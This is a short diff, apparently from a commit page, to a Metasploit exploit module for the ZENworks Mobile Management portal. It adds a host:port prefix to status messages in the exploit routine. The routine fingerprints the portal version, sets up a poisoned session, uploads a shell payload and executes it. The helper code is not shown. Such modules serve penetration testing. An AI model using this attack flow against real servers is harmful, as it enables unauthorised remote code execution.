@@ -48,6 +48,10 @@ def initialize
48
48
] , self . class )
49
49
end
50
50
51
+ def peer
52
+ "#{ rhost } :#{ rport } "
53
+ end
54
+
51
55
def setup_session ( )
52
56
sess = Rex ::Text . rand_text_alpha ( 8 )
53
57
cmd = Rex ::Text . rand_text_alpha ( 8 )
@@ -108,17 +112,17 @@ def exploit()
108
112
} )
109
113
110
114
if ( res and res . code == 200 and res . body . to_s . match ( /ZENworks Mobile Management User Self-Administration Portal/ ) != nil )
111
- print_status ( "Found Zenworks MDM, Checking application version" )
115
+ print_status ( "#{ peer } - Found Zenworks MDM, Checking application version" )
112
116
ver = res . body . to_s . match ( /<p id="version">Version (.*)<\/ p>/ ) [ 1 ]
113
- print_status ( "Found Version #{ ver } " )
114
- print_status ( "Setting up poisoned session" )
117
+ print_status ( "#{ peer } - Found Version #{ ver } " )
118
+ print_status ( "#{ peer } - Setting up poisoned session" )
115
119
session_id , cmd = setup_session ( )
116
- print_status ( "Uploading payload" )
120
+ print_status ( "#{ peer } - Uploading payload" )
117
121
fname = upload_shell ( session_id , cmd )
118
- print_status ( "Executing payload" )
122
+ print_status ( "#{ peer } - Executing payload" )
119
123
exec_shell ( session_id , cmd , fname )
120
124
else
121
- print_error ( "Zenworks MDM does not appear to be running at #{ rhost } " )
125
+ print_error ( "#{ peer } - Zenworks MDM does not appear to be running at #{ rhost } " )
122
126
return :abort
123
127
end
124
128
0 commit comments